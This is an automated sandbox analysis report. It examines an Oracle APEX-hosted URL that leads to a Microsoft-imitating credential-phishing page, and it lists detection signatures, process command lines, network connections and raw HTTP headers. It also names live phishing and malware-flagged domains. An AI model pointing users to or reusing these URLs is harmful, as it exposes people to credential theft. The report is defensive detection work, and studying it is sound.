Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document

Overview

General Information

Sample URL:https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document
Analysis ID:1665614
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish10
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3088 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 2936 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,914435731503330310,7250161230368154538,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 6624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-document" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    1.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: https://5348785839.sbs/google.phpAvira URL Cloud: Label: malware

      Phishing

      barindex
      Source: https://terinv.portrayed.it.com/ieyeb/Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'terinv.portrayed.it.com' does not match the legitimate domain for Microsoft., The URL contains multiple subdomains and an unusual structure, which is a common tactic in phishing attempts., The domain 'it.com' is not typically associated with Microsoft., The presence of input fields for 'Email, phone, or Skype' is consistent with phishing attempts targeting Microsoft accounts. DOM: 1.6.pages.csv
      Source: Yara matchFile source: 1.6.pages.csv, type: HTML
      Source: Yara matchFile source: 1.7.pages.csv, type: HTML
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: Number of links: 0
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://apex.oracle.com/pls/apex/r/capsicure/file-document/file-documentHTTP Parser: Base64 decoded: {"numericCharacters":".,","currency":"$","isoCurrency":"AMERICA","dualCurrency":"$"}
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: Title: Sign in to your account does not match URL
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: Invalid link: Privacy statement
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: Invalid link: Privacy statement
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: <input type="password" .../> found
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No favicon
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No favicon
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No favicon
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No favicon
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No favicon
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No <meta name="author".. found
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No <meta name="author".. found
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No <meta name="copyright".. found
      Source: https://terinv.portrayed.it.com/ieyeb/HTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.76.210.90:443 -> 192.168.2.16:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.17.44.16:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.191.100:443 -> 192.168.2.16:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.178:443 -> 192.168.2.16:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.32.178:443 -> 192.168.2.16:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.92.58:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49763 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49760 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 119.28.146.206:443 -> 192.168.2.16:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.201.1:443 -> 192.168.2.16:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.231.24:443 -> 192.168.2.16:49766 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 69.49.231.24:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.12:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49773 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49778 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 96.7.218.74:443 -> 192.168.2.16:49779 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.1.33.15:443 -> 192.168.2.16:49780 version: TLS 1.2
      Source: chrome.exeMemory has grown: Private usage: 14MB later: 40MB
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /pls/apex/r/capsicure/file-document/file-document HTTP/1.1Host: apex.oracle.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pls/apex/wwv_flow.js_messages?p_app_id=254038&p_lang=en&p_version=24.2.2-15618029960919&p_nls_settings=eyJudW1lcmljQ2hhcmFjdGVycyI6Ii4sIiwiY3VycmVuY3kiOiIkIiwiaXNvQ3VycmVuY3kiOiJBTUVSSUNBIiwiZHVhbEN1cnJlbmN5IjoiJCJ9 HTTP/1.1Host: apex.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ORA_WWV_APP_254038=ORA_WWV-S7pbr-gl4_gT8L7wpha0MBHv; ORA_WWV_RAC_INSTANCE=1
      Source: global trafficHTTP traffic detected: GET /pls/apex/wwv_flow.js_dialogs?p_app_id=254038&p_version=24.2.2-15618029960919 HTTP/1.1Host: apex.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ORA_WWV_APP_254038=ORA_WWV-S7pbr-gl4_gT8L7wpha0MBHv; ORA_WWV_RAC_INSTANCE=1
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/app_ui/css/Core.min.css?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/app_ui/css/Theme-Standard.min.css?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/libraries/font-apex/2.4/css/font-apex.min.css?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/themes/theme_42/24.2/css/Core.min.css?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/themes/theme_42/24.2/css/Vita.min.css?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/libraries/apex/minified/desktop_all.min.js?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/libraries/apex/minified/widget.stickyWidget.min.js?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/themes/theme_42/24.2/js/theme42.min.js?v=24.2.2 HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/libraries/font-apex/2.4/fonts/Font-APEX-Small.woff2? HTTP/1.1Host: static.oracle.comConnection: keep-aliveOrigin: https://apex.oracle.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.oracle.com/cdn/apex/24.2.2/libraries/font-apex/2.4/css/font-apex.min.css?v=24.2.2Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/app_ui/font/apex-5-icon-font.woff2 HTTP/1.1Host: static.oracle.comConnection: keep-aliveOrigin: https://apex.oracle.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://static.oracle.com/cdn/apex/24.2.2/app_ui/css/Core.min.css?v=24.2.2Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/localeElements.js HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn/apex/24.2.2/libraries/oraclejet/17.0.2/js/libs/oj/17.0.2/resources/nls/en/localeElements.js HTTP/1.1Host: static.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /pls/apex/r/capsicure/254038/files/static/v6/icons/app-icon-32.png HTTP/1.1Host: apex.oracle.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ORA_WWV_APP_254038=ORA_WWV-S7pbr-gl4_gT8L7wpha0MBHv; ORA_WWV_RAC_INSTANCE=1
      Source: global trafficHTTP traffic detected: GET /pls/apex/r/capsicure/file-document/sw.js?v=24.2.2-15618029960919&lang=en HTTP/1.1Host: apex.oracle.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://apex.oracle.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ORA_WWV_APP_254038=ORA_WWV-S7pbr-gl4_gT8L7wpha0MBHv; ORA_WWV_RAC_INSTANCE=1
      Source: global trafficHTTP traffic detected: GET /pls/apex/r/capsicure/254038/files/static/v6/icons/app-icon-32.png HTTP/1.1Host: apex.oracle.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: ORA_WWV_APP_254038=ORA_WWV-S7pbr-gl4_gT8L7wpha0MBHv; ORA_WWV_RAC_INSTANCE=1
      Source: global trafficHTTP traffic detected: GET /ieyeb HTTP/1.1Host: terinv.portrayed.it.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://apex.oracle.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ieyeb/ HTTP/1.1Host: terinv.portrayed.it.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/580ba44007a6/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /logos/assets/PNG/Microsoft_Logo_512px.png HTTP/1.1Host: mailmeteor.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
